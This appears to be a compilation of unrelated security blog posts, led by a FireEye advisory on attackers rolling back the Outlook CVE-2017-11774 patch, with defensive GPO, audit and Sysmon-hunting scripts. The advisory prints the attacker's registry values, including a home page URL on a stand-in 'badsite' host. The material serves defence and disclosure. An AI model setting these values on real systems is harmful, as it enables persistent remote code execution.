  • LD_PRELOAD the library to your binary and then analyse its findings in syslog. You can also add the library to /etc/, which will preload it in all binaries running on the system.
  • It will then gather the PID and the command line of the calling process, arguments of the vulnerable function, and a stack trace -- this provides a starting point for further investigation. At this point, you can use the stack trace to find the code path that triggered the violation and manually analyse what would happen if you pointed the path at an arbitrary file or directory.
  • For example, if the code is opening a file and returning the content to the user then you could use it to read arbitrary files. If you control the path of chmod or chown, you might be able to change the permissions of chosen files and so on.
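The per-component check the post describes, as an added example in Python (not PathAuditor's own code, which is a C shared library): every component of a path is inspected with lstat() and reported if an unprivileged user could swap it for a symlink, that is, symlinks themselves, world-writable directories, directories owned by someone other than root or the caller, and, at lower severity, sticky directories such as /tmp. The fixture built by build_demo_tree() is constructed for the demonstration.

```python
import os
import stat
import tempfile
from typing import Dict, List, Tuple

Finding = Tuple[str, str]   # (component path, reason)


def _owner_is_untrusted(st: os.stat_result) -> bool:
    """Anyone other than root or the calling user can rename/replace their own entries."""
    return st.st_uid not in (0, os.geteuid())


def audit_path(path: str) -> List[Finding]:
    """Return the components of `path` that a non-root user could replace or redirect."""
    findings: List[Finding] = []
    parts = os.path.normpath(os.path.abspath(path)).split(os.sep)
    current = os.sep
    for part in parts:
        if not part:
            continue
        current = os.path.join(current, part)
        try:
            st = os.lstat(current)              # lstat: never follow links while auditing
        except FileNotFoundError:
            break                               # the parent's writability already decides this
        if stat.S_ISLNK(st.st_mode):
            findings.append((current, "symlink"))
        if _owner_is_untrusted(st):
            findings.append((current, f"owned by uid {st.st_uid}"))
        if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
            if st.st_mode & stat.S_ISVTX:
                # Entries can only be replaced by their owner, but a second bug that
                # deletes files (as the post notes) would make this exploitable.
                findings.append((current, "sticky world-writable directory"))
            else:
                findings.append((current, "world-writable directory"))
    return findings


def build_demo_tree() -> Dict[str, str]:
    """Constructed fixture: one file under a world-writable dir, one under a private dir."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    exposed_dir = os.path.join(root, "dropbox")
    private_dir = os.path.join(root, "private")
    os.mkdir(exposed_dir)
    os.chmod(exposed_dir, 0o777)
    os.mkdir(private_dir)
    os.chmod(private_dir, 0o700)
    for d in (exposed_dir, private_dir):
        with open(os.path.join(d, "foo"), "w") as fh:
            fh.write("x")
    return {
        "exposed_dir": exposed_dir,
        "exposed_file": os.path.join(exposed_dir, "foo"),
        "private_dir": private_dir,
        "private_file": os.path.join(private_dir, "foo"),
    }


if __name__ == "__main__":
    tree = build_demo_tree()
    for label in ("exposed_file", "private_file"):
        print(label)
        for component, reason in audit_path(tree[label]):
            print(f"  {component}: {reason}")
```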
PathAuditor has proved successful at Google and we're excited to share it with the community. The project is still in the early stages and we are actively working on it. We look forward to hearing about any vulnerabilities you discover with the tool, and hope to see pull requests with further improvements.

Try out the PathAuditor tool here.

Marta Rożek was a Google Summer intern in 2019 and contributed to this blog and the PathAuditor tool

Weekly Update 168

I'm presently on the YOW! conference tour which means doing the same keynote three times over in Sydney, Brisbane and Melbourne. It's my first time back at YOW! since 2015 and it's always a nice way to wrap up the year, especially the Brisbane leg I'm on at the moment in my home state. That's kept me busy, but it's some tweets last week that have kept me entertained so I'm talking about those as well as some reflections on what is now 6 years of running HIBP.

Next update I'll try and push out a little earlier to align with YOW! in Melbourne and hopefully give myself a bit more downtime come the weekend.


  1. It's not just Let's Encrypt issuing certs to phishing sites (and that's fine, so let's stop throwing them under the bus for it)
  2. Plain text password storage - even generated ones - is wrong on many levels (the UX alone just doesn't make any sense)
  3. Big thanks to Whois XML API for sponsoring my blog this week! A lack of domain intelligence causes data breaches. Test their Security Enterprise API & Data Feed packages with free credits!

The Guardian view on Boris Johnson’s NHS plan: trading patient data | Editorial

Donald Trump has made clear he wants a post-Brexit Britain to let US tech companies and big pharma access medical records

The NHS is a goldmine of patient data which the United States wants to be quarried by some of its biggest companies. Britain’s health service is home to a unique medical dataset that covers the entire population from birth to death. Jeremy Corbyn’s NHS press conference revealed that the US wanted its companies to get unrestricted access to the UK’s medical records, thought to be worth £10bn a year. A number of tech companies – including Google – already mine small parts of the NHS store. Ministers have been treading carefully after an attempt to create a single patient database for commercial exploitation was scrapped in 2016 when it emerged there was no way for the public to work out who would have access to their medical records or how they were using them.

However, such caution might be thrown to the wind if Boris Johnson gets his way over Brexit – and patients’ privacy rights are traded away for US market access. This would be a damaging step, allowing US big tech and big pharma to collect sensitive, personal data on an unprecedented scale. Donald Trump’s officials have already made clear that this is what they are aiming for. In the leaked government records of talks between US and UK trade representatives White House officials state that “the free flow of data is a top priority” in a post-Brexit world. Trump’s team see Brexit as an opportunity “to avoid forcing companies to disclose algorithms”. The US wants the UK to drop the EU’s 2018 data law, in which individuals must be told what is happening with their medical data, even if scrubbed of personal identifiers.


It's Time to Help Defend Organizations Worldwide


I trust this finds you all doing well. It has been a few months since I last blogged - pardon the absence. I had to focus my energies on helping the world get some perspective, getting 007G ready for launch, and dealing with a certain nuisance.

Having successfully accomplished all three objectives, it is TIME to help defend organizations worldwide from the SPECTRE of potentially colossal compromise, which is a real cyber security risk that looms over 85% of organizations worldwide.

When you know as much as I do, care as much as I do, and possess as much capability as I do, you not only shoulder a great responsibility, you almost have an obligation to educate the whole world about cyber security risks that threaten their security.

So, even though I barely have any time to do this, in the interest of foundational cyber security worldwide, I'm going to start sharing a few valuable perspectives again, and do so on this blog, that blog and the official PD blog (see below).

Speaking of which, earlier this week, I had the PRIVILEGE to launch the official PD blog -

Stay tuned for some valuable cyber security insights right here from January 06, 2020
and let me take your leave with a befitting (and one of my favorite) song(s) -

Best wishes,

PS: Just a month ago, the $ Billion Czech cyber security company Avast was substantially compromised, and guess what the perpetrators used to compromise them? They used the EXACT means I had clearly warned about TWO years ago, right here.

DevSecOps Challenges From a Security Perspective

The transition from DevOps to DevSecOps requires security professionals to have a whole new understanding of development processes, priorities, tools, and pain points. It’s no longer feasible for security professionals to get by with a superficial understanding of how developers work. But this understanding can be a significant undertaking for most security pros who haven’t had to be immersed in the development side of the house previously.

In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis notes of security teams and DevSecOps, “Their challenge is to understand what development is trying to accomplish, integrate with them in some fashion, and figure out how to leverage automated security testing to be at least as agile as development.”

In this same paper, Securosis highlights the questions security professionals ask them most often surrounding DevSecOps, which include “can we realistically modify developer behavior?”, “what tools do we start with to ‘shift left’?” and “how do we integrate security testing into the development pipeline?” These are all valid and important questions, but Securosis points out that there are also questions security teams should be asking, but aren’t, including:

  • How do we fit — operationally and culturally — into DevSecOps?
  • How do we get visibility into Development and their practices?
  • How do we know changes are effective? What metrics should we collect and monitor?
  • How do we support Development?
  • Do we need to know how to code?

The questions the security team is currently asking are about security tasks in DevSecOps; the questions they aren’t asking are about how to understand and work with the development organization. And those are the questions they should start asking. Where to start? The key development areas security teams need to understand when trying to get a handle on application security include the following:

Process: At the very least understand why development processes have changed over the years, what they are trying to achieve, and make sure security testing embraces the same ideals.

Developer tools: You need to understand the tools developers use to manage the code they are building in order to understand where code can be inspected for security issues.

Code: Security tests are shifting left and looking at code, not fully developed applications. The traditional thinking about security audits needs to shift as well.

Open source: You would be hard-pressed to find an app that isn’t made up primarily of open source code. Understand why, and then work with the development team to help them continue to use open source code, but in a secure way.

How security tools affect developer processes: Make sure the security tools you select integrate with the tools and processes developers already use and don’t slow them down with false positives.

Cultural dynamics: You need to fully understand the development team’s goals and priorities – which are most often centered around speed. That understanding is key to getting developer buy-in and acceptance.

SDLC: It’s best practice to include some kind of security analysis in each phase of the software lifecycle. For instance, threat modeling during design, and software composition analysis during development. In this way, you establish a process-independent AppSec program that will work with varying development processes.

For more details on these development areas and practical advice on building an effective DevSecOps program, check out the full Securosis report.

Cyber News Rundown: ZeroCleare Malware


ZeroCleare Malware Wiping Systems

IBM researchers have been tracking the steady rise in ZeroCleare deployments throughout the last year, culminating in a significant rise in 2019. This malware is deployed on both 32- and 64-bit systems in highly targeted attacks, with the capability to completely wipe the system by exploiting the EldoS RawDisk driver (which was also used in prior targeted attacks). The malware itself appears to be spreading through TeamViewer sessions and, though the 32-bit variant seems to crash before wiping can begin, the 64-bit variant has the potential to cause devastating damage to the multi-national corporations being targeted.

FTC Scam Threatens Victims with Terrorism Charges

FTC officials recently made an announcement regarding scam letters purporting to be from the commission and the numerous complaints the letters have sparked from the public. Victims of the scam are told that, due to some suspicious activity, they will be personally and financially monitored as well as face possible charges for terrorism. These types of scams are fairly common and have been in use for many years, often targeting the elderly with greater success.


Misreported Data Breach Costs Hospital Millions

Following an April 2017 complaint, the Office for Civil Rights has issued a fine of $2.175 million after discovering that Sentara Hospitals had distributed the private health information of 577 patients, but only reported eight affected. Moreover, it took over a year for the healthcare provider to take full responsibility for the breach and begin correcting their security policies for handling sensitive information. HIPAA violations are extremely time-sensitive, and the slow response from Sentara staff could act as a lesson for other organizations to ensure similar events don’t reoccur.

Android Vulnerability Allows Hackers Easy Access

Researchers have identified a new Android exploit that allows hackers access to banking applications by quickly stealing login credentials after showing the victim a legitimate app icon, requesting additional permissions, and then sending the user to their expected app. Even more worrisome, this vulnerability exists within all current versions of AndroidOS and, while not found on the Google Play Store, some illicit downloaders were distributing it.

Smith & Wesson Hit by Magecart

In the days leading up to Black Friday, one of the largest retail shopping days of the year, malicious skimming code was placed onto the computer systems and, subsequently, the website of Smith & Wesson. In a slight break from normal Magecart tactics, the attackers masqueraded as a security vendor to make their campaign less visible. The card-skimming code was first placed onto the website on November 27 and was still active through December 2.

The post Cyber News Rundown: ZeroCleare Malware appeared first on Webroot Blog.

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

It's December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020. With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.

Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
Hackers are already using AI to launch sophisticated attacks – for example AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operational technology (OT) and information technology (IT) networks, i.e. the convergence of industrial control systems and traditional corporate IT systems. While this union of formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.

Has WhatsApp become a potential career assassin? | Afua Hirsch

The app helped connect me to an inspiring sisterhood. But the case of police officer Robyn Williams shows unopened messages can be a legal minefield

We need to talk about WhatsApp. When the little green speech bubble first showed up in my life, I greeted it with awe and wonder. I even wrote a little love letter to its ability to connect with a virtual black sisterhood – the kind that rarely exists in our too-undiverse workplaces in real life – in my first book. It became the perfect platform to share experiences, frustrations, strategies and ideas.

WhatsApp group communities proliferated on my phone – they were education, community and activism all in one place. It was great.


Be Alert this Holiday Season: Payment Security Tips for Businesses

On this blog we explore the challenges around security of payment data during the hectic holiday season and provide tips and best practices to help restaurants better secure their payment data.  The following is a Q & A with Troy Leach, Senior Vice President of the PCI Security Standards Council and Laura Chadwick, Program Director, Technology & Innovation of the National Restaurant Association about the importance of cybersecurity this holiday season.

Just Published: PCI Contactless Payments on COTS

The PCI Security Standards Council (PCI SSC) has published a new data security standard for solutions that enable merchants to accept contactless payments using a smartphone or other commercial off-the-shelf (COTS) mobile device with near-field communication (NFC). Here’s what you need to know about the new PCI Contactless Payments on COTS (CPoC™) Standard and its supporting validation program.

Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)

Attackers have a dirty little secret that is being used to conduct big intrusions. We'll explain how they are "unpatching" a fixed vulnerability and then provide new Outlook hardening guidance that is not available elsewhere. Specifically, this blog post covers field-tested, automated registry processing for the keys that protect against attacker attempts to reverse Microsoft's CVE-2017-11774 patch functionality.

Despite multiple warnings from FireEye and U.S. Cyber Command, we have continued to observe an uptick in successful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims’ Outlook client homepages for code execution and persistence. The Outlook Home Page feature allows for customization of the default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and displayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference either an internal or external network location. When Outlook loads the remote URL, it will render the contents using the Windows DLL ieframe.dll, which can allow an attacker to achieve remote code execution that persists through system restarts.

We have observed multiple threat actors adopting the technique, and it eventually became a favorite of Iranian groups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by its adoption by APT33 for a significantly broader campaign beginning in July 2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our Advanced Practices team worked with MITRE to update the ATT&CK framework to include CVE-2017-11774 home page persistence within technique T1137 – “Office Application Startup”.

For more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside password spraying, and some common pitfalls for incident responders analyzing this home page technique, see the “RULER In-The-Wild” section of our December 2018 OVERRULED blog post.

Going Through a Rough Patch

On October 10, 2017, Microsoft released patches for Microsoft Outlook to protect against this technique.

  • KB4011196 (Outlook 2010)
  • KB4011178 (Outlook 2013)
  • KB4011162 (Outlook 2016)

Following the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye Mandiant team began to raise awareness of how the patch could be subverted. In December 2018, Doug Bienstock described the simple rollback of the patch as part of Mandiant's Red Team operations, and alluded to having observed authorized software that also automatically removes the patch functionality. In response to U.S. Cyber Command's mid-2019 warning about APT33's use of the exploit, we raised concern with DarkReading over the ability to override the CVE-2017-11774 patch without escalated privileges.

Without continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed within this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections provided by the patches.

An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. The "URL" value under a folder subkey (for example, Inbox) enables and sets a home page for that folder within the default mailbox. Setting this value to a valid URL enables the home page regardless of whether the patch has been applied. Although the option will not be accessible from the Outlook user interface (UI), it will still be set and rendered. Importantly, these keys live in the logged-on user's registry hive (HKCU), so no special privileges are required to edit them and roll back the patch. The FireEye Red Team found that no other registry modifications were required to set a malicious Outlook home page.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView\Inbox
"URL"="http://badsite/homepage-persist.html"

There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableRoamingFolderHomepages"= dword:00000001

The following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home page.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"NonDefaultStoreScript"= dword:00000001

The following setting will allow for “Run as a Script” and “Start Application” rules to be re-enabled.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableUnsafeClientMailRules"= dword:00000001

Etienne Stalmans, a developer of SensePost's RULER and the credited responsible discloser of CVE-2017-11774, raised similar concerns about the patch, which were revisited after a September 2018 blog post described applying the same technique to Outlook Today's home page, stored at HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\Today\UserDefinedUrl. Both Etienne and the September 2018 post's author describe what Microsoft has suggested as a key mitigating factor: the exploit, and rolling back the patch, require some form of initial access. This is consistent with Microsoft's position and its 2007 immutable laws of security blog post, which MSRC reiterated when we contacted them prior to publishing this blog post.

We agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to run his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no public mitigation guidance is available, and, as a fresh in-the-wild example in this post demonstrates, that initial access and patch overriding can be completely automated.

A Cavalier Handling of CVE-2017-11774

The Advanced Practices team monitors for novel implementations of attacker techniques including this patch override, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The sample, “TARA Pipeline.xlsm” (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros combining several techniques, including:

  • execution guardrails to only launch on the victim domain (client redacted in screenshot)
  • custom pipe-delimited character substitution obfuscation
  • a creative implementation of CVE-2017-11774 using the lesser-known HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView\Calendar\URL registry key
  • a URL pointing to the payload hosted in Azure storage blobs, a creative technique that allows an attacker-controlled, swappable payload to be hosted on a legitimate service
  • and most importantly for this blog post – a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook

These features of the malicious spear phishing Excel macro can be seen in Figure 1.

Figure 1: Malicious macros automatically reverting the CVE-2017-11774 patch

Pay special attention to the forced setting of EnableRoamingFolderHomepages to “1” and the setup of “Calendar\URL” key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch on initial infection.

In support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat activity – whether the intrusion operators turn out to be authorized or unauthorized – in order to prioritize and deconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity associated with authorized red teaming, UNC1194, but you might know them better as the TrustedSec red team, whose founder, Dave Kennedy, appeared on a previous episode of State of the Hack. This malicious Excel file appears to be a weaponized version of a legitimate victim-created document that we also obtained, reflecting a technique becoming more common with both authorized and unauthorized intrusion operators. For further analysis and screenshots of UNC1194's next-stage CVE-2017-11774 payload for initial reconnaissance, target logging visibility checks, and domain-fronted Azure command and control, see here. Readers should take note that the automated patch removal and home page exploitation establishes attacker-controlled remote code execution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their payload remotely for all follow-on activity.

Locking Down the Registry Keys Using Group Policy Object (GPO) Enforcement

As established, the patches for CVE-2017-11774 can be effectively “disabled” by modifying registry keys on an endpoint with no special privileges. The following registry keys and values should be configured via Group Policy to reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security configuration on an endpoint to allow for Outlook home page persistence for malicious purposes.

To protect against an attacker using Outlook’s WebView functionality to configure home page persistence, the following registry key configuration should be enforced.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView
"Disable"= dword:00000001

Note: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a sampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Webview
        • Value Name: Disable
      • Value Type: REG_DWORD
      • Value Data: 00000001

Figure 2: Disabling WebView registry setting

Included within the Microsoft Office Administrative Templates, a GPO setting is available which can be configured to disable a home page URL from being set in folder properties for all default folders, or for each folder individually.  If set to “Enabled”, the following GPO setting essentially enforces the same registry configuration (disabling WebView) as previously noted.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Folder Home Pages for Outlook Special Folders > Do not allow Home Page URL to be set in folder Properties

The registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableRoamingFolderHomepages"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableRoamingFolderHomepages
      • Value Type: REG_DWORD
      • Value Data: 00000000

Figure 3: EnableRoamingFolderHomepages registry setting

Additionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality is disabled once the patch has been installed, but it can be re-enabled by an attacker. Just like this blog post’s illustration of several different home page URL registry keys abused in-the-wild – including the Outlook Today setting from September 2018 and the Calendar URL setting from UNC1194’s November 2019 malicious macros – these non-default mailstores provide additional CVE-2017-11774 attack surface.

The registry key configuration to enforce the recommended registry configuration is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"NonDefaultStoreScript"= dword:00000000

To enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: NonDefaultStoreScript
      • Value Type: REG_DWORD
      • Value Data: 00000000

Figure 4: NonDefaultStoreScript registry setting

Included within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available which can be configured to not allow folders in non-default stores to be set as folder home pages.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Outlook Options > Other > Advanced > Do not allow folders in non-default stores to be set as folder home pages

While you’re locking things down, we thought that readers would also want to ensure they are locked down against RULER’s other modules for rules-based persistence and forms-based persistence. This last recommendation ensures that the rule types required by the other RULER modules are no longer permissible on an endpoint. While not CVE-2017-11774, this is closely related and this last setting is consistent with Microsoft’s prior guidance on rules and forms persistence.

The registry key configuration to protect against an attacker re-enabling “Run as a Script” and “Start Application” rules is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableUnsafeClientMailRules"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableUnsafeClientMailRules
      • Value Type: REG_DWORD
      • Value Data: 00000000

Figure 5: EnableUnsafeClientMailRules registry setting

Once all of the aforementioned endpoint policies are configured, we recommend a final step to protect these settings from unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed and applied to an endpoint, even if a registry value was intentionally reversed by an attacker, the following GPO settings should also be configured and enforced:

  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing
    • Enabled - Process even if the Group Policy objects have not changed
  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing
    • Enabled - Process even if the Group Policy objects have not changed

Figure 6: Group Policy processing settings
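The attacker-side values described earlier (WebView\<Folder>\URL, Today\UserDefinedUrl and the three Security switches) and the hardened values enforced in this section are the same small set of HKCU values, so one script can both audit and reset them on a host. The following PowerShell is an added example, not FireEye or Mandiant tooling; it assumes the Office version subkeys are numeric (14.0 for Outlook 2010, 15.0 for 2013, 16.0 for 2016 and later) and that it runs in the context of the user whose hive is being checked. The Add-Finding helper is part of the example, not an Outlook or Windows API.

```powershell
# Added example (not FireEye/Mandiant code): audit, and optionally reset, the HKCU values that give an
# attacker Outlook home page persistence or undo the CVE-2017-11774 patch.
# Assumption: Office version subkeys are numeric (14.0 = Outlook 2010, 15.0 = 2013, 16.0 = 2016 and later).
[CmdletBinding()]
param(
    [switch]$Remediate   # report only unless this switch is given
)

$officeRoot = 'HKCU:\Software\Microsoft\Office'

# Patch-override switches and the value each should hold once hardened (see the GPO section above)
$hardened = @{
    'Security\EnableRoamingFolderHomepages' = 0
    'Security\NonDefaultStoreScript'        = 0
    'Security\EnableUnsafeClientMailRules'  = 0
    'WebView\Disable'                       = 1
}

function Add-Finding {
    param($Version, $Setting, $Value, $Expected)
    [pscustomobject]@{ Version = $Version; Setting = $Setting; Current = $Value; Expected = $Expected }
}

$findings = @()
$versions = Get-ChildItem $officeRoot -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^\d+\.\d+$' -and (Test-Path "$officeRoot\$($_.PSChildName)\Outlook") } |
    ForEach-Object { $_.PSChildName }

foreach ($ver in $versions) {
    $outlook = "$officeRoot\$ver\Outlook"

    # 1. Folder home pages: a URL value under WebView\<Folder> (Inbox, Calendar, ...) is live whether or
    #    not the patch is installed, so every one found is reported.
    foreach ($folder in (Get-ChildItem "$outlook\WebView" -ErrorAction SilentlyContinue)) {
        $folderPath = "$outlook\WebView\$($folder.PSChildName)"
        $url = (Get-ItemProperty -Path $folderPath -Name URL -ErrorAction SilentlyContinue).URL
        if ($url) {
            $findings += Add-Finding $ver "WebView\$($folder.PSChildName)\URL" $url '<absent>'
            if ($Remediate) { Remove-ItemProperty -Path $folderPath -Name URL }
        }
    }

    # 2. Outlook Today home page (the variant from the September 2018 blog post)
    $todayUrl = (Get-ItemProperty -Path "$outlook\Today" -Name UserDefinedUrl -ErrorAction SilentlyContinue).UserDefinedUrl
    if ($todayUrl) {
        $findings += Add-Finding $ver 'Today\UserDefinedUrl' $todayUrl '<absent>'
        if ($Remediate) { Remove-ItemProperty -Path "$outlook\Today" -Name UserDefinedUrl }
    }

    # 3. Patch-override switches: anything other than the hardened value (including "not set") is reported
    foreach ($entry in $hardened.GetEnumerator()) {
        $subKey, $name = $entry.Key -split '\\', 2
        $keyPath = "$outlook\$subKey"
        $current = (Get-ItemProperty -Path $keyPath -Name $name -ErrorAction SilentlyContinue).$name
        if ($current -ne $entry.Value) {
            $shown = if ($null -eq $current) { '<not set>' } else { $current }
            $findings += Add-Finding $ver $entry.Key $shown $entry.Value
            if ($Remediate) {
                if (-not (Test-Path $keyPath)) { New-Item -Path $keyPath -Force | Out-Null }
                New-ItemProperty -Path $keyPath -Name $name -PropertyType DWord -Value $entry.Value -Force | Out-Null
            }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize }
else { "No Outlook home page URLs or patch-override settings found (versions checked: $($versions -join ', '))" }
```

Run it without arguments to report, and with -Remediate to remove any home page URL and write the hardened values. Treat the remediation as incident-response cleanup only: because these values live in HKCU, a macro can rewrite them a moment later, and only the GPO enforcement described above, with registry policy processing set to run even when the GPO has not changed, keeps them in place. Removing a WebView URL will also remove a home page an administrator set deliberately, so review the value before deleting it.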

For more environment hardening advice informed by front-line incident response, reach out to our Mandiant Security Transformation Services consulting team.

Let’s Go Hunt (doo doo doo)

With this blog post, we’re providing an IOC for monitoring CVE-2017-11774 registry tampering – while written for FireEye Endpoint Security (HX) in the OpenIOC 1.1 schema, this is a flexible behavioral detection standard that supports real-time and historical events and the logic can be repurposed for other endpoint products.

The Yara hunting rule provided by Nick Carr at the end of the OVERRULED blog post still captures payloads using CVE-2017-11774, including all of those used in the intrusions referenced in this post, and can also be used to proactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection against CVE-2017-11774 is also covered in the OVERRULED blog post.
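The OpenIOC referenced above is not reproduced on this page, but the same tampering is visible to any endpoint tool that records registry value writes, and the value paths listed in this post are enough to build the logic. The following PowerShell is an added example, not FireEye's IOC: it assumes Sysmon is installed with a configuration that logs RegistryEvent for the Office keys, and reads Sysmon's Event ID 13 (registry value set) records from the standard Microsoft-Windows-Sysmon/Operational log, flagging writes to the home page and patch-override values named in this post.

```powershell
# Added example (not FireEye's OpenIOC): hunt Sysmon Event ID 13 (registry value set) records for writes
# to the CVE-2017-11774 home page and patch-override values. Assumes Sysmon is installed and configured to
# log RegistryEvent for the Office keys; log name and EventData field names are Sysmon's defaults.
param(
    [int]$Days = 30   # how far back to search
)

# Value paths from this post. HKCU appears as HKU\<SID>\... in Sysmon's TargetObject, so the hive is not anchored.
$tamperPatterns = @(
    '\\Software\\Microsoft\\Office\\[^\\]+\\Outlook\\WebView\\[^\\]+\\URL$',  # folder home page (Inbox, Calendar, ...)
    '\\Outlook\\Today\\UserDefinedUrl$',                                    # Outlook Today home page
    '\\Outlook\\WebView\\Disable$',                                         # hardening switch being flipped
    '\\Outlook\\Security\\(EnableRoamingFolderHomepages|NonDefaultStoreScript|EnableUnsafeClientMailRules)$'
)
$tamperRegex = [regex]::new(($tamperPatterns -join '|'), [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)

$filter = @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 13
    StartTime = (Get-Date).AddDays(-$Days)
}

Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
    # Lift the named EventData fields (Image, TargetObject, Details, ...) out of the event XML
    $xml  = [xml]$_.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    if ($data.TargetObject -and $tamperRegex.IsMatch($data.TargetObject)) {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Image   = $data.Image          # EXCEL.EXE or WINWORD.EXE writing these is the macro case in this post
            Target  = $data.TargetObject
            Details = $data.Details        # the URL, or "DWORD (0x00000001)" for a switch being re-enabled
            # Rough triage hint: Outlook maintaining its own keys is expected; anything else deserves a look
            Suspect = ($data.Image -notmatch '\\outlook\.exe$')
        }
    }
} | Sort-Object Time -Descending | Format-Table -AutoSize
```

For the UNC1194 sample described above, the records of interest would show EXCEL.EXE as the Image writing WebView\Calendar\URL and Security\EnableRoamingFolderHomepages within seconds of the document opening; the Group Policy client re-applying the hardened values after a tamper attempt will also appear here, which is a useful confirmation that the enforcement in the previous section is working.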

If you’ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we recommend:

Interesting MITRE ATT&CK techniques explicitly referenced in this blog post:

